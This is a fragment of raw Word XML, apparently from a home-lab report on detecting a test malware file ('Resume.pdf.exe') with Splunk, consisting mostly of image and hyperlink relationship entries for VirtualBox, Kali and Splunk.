    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D4">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Which machine is this?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D5">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Why is it connecting through that port?</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if I query my malware file Resume.pdf.exe this is what would appear and would require further investigation.</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79900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="36"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sectPr>
      <w:headerReference r:id="rId74" w:type="default"/>
      <w:footerReference r:id="rId7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44.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId43"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63.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.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hyperlink" Target="https://www.virtualbox.org/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virtualbox.org/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.png"/><Relationship Id="rId60"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7.png"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://kali.org" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.splunk.com/" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.splunk.com/" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.splunk.com/" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.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